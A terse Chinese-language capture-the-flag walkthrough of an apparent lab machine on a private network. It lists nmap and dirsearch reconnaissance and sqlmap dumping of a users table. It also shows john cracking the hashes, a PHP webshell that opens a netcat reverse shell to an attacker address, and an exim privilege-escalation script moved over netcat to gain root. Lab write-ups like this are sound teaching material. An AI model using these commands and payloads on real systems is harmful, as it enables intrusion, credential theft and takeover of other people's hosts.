文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
#主机探测-端口扫描
arp-scan -l
nmap -F -T4 -sS -sV 192.168.43.12
#指纹识别-目录爆破
whatweb http://192.168.43.12
dirsearch -u http://192.168.43.12
#Web界面-登录界面
/user/login --登陆界面
#URL存在Sql注入
首页存在sql注入
#Sqlmap梭哈-
库
sqlmap -u "http://192.168.43.12/?nid=2" --level=5 --risk=3 --batch -D --current-db
表
sqlmap -u "http://192.168.43.12/?nid=2" --level=5 --risk=3 --batch -D 'd7db' --tables
字段名
sqlmap -u "http://192.168.43.12/?nid=2" --level=5 --risk=3 --batch -D 'd7db' -T 'users' --columns
字段
sqlmap -u "http://192.168.43.12/?nid=2" --level=5 --risk=3 --batch -D 'd7db' -T 'users' -C 'name,pass,uid' -dump
#得到的账密保存下来--->mima.txt
#john猜解密码
john mima.txt ---turtle
#web登录john用户-写马
#🐎子在哪里写??
<?php system("nc -e /bin/bash 192.168.43.33 8888");?>
#返回主页提交表单
#反弹shell
kali:
nc -lvvp 8888
python -c "import pty;pty.spawn('/bin/bash')"
#SUID提权-exim
find / -user root -perm -4000 -print 2>/dev/null
#存在exim
exim --version --4.89
#上传46996.sh到靶机
searchsploit exim ---找本地权限提升的脚本,也就是local privilege esc
cp /usr/....../46996.sh .
nc -lnvp 192.168.43.12 2333 < 46996.sh
靶机:
nc 192.168.43.33 2333 > 46996.sh
#运行脚本
cd /tmp
chmod 777 46996.sh
./46996.sh -m netcat
#FLAG
cat flag.txt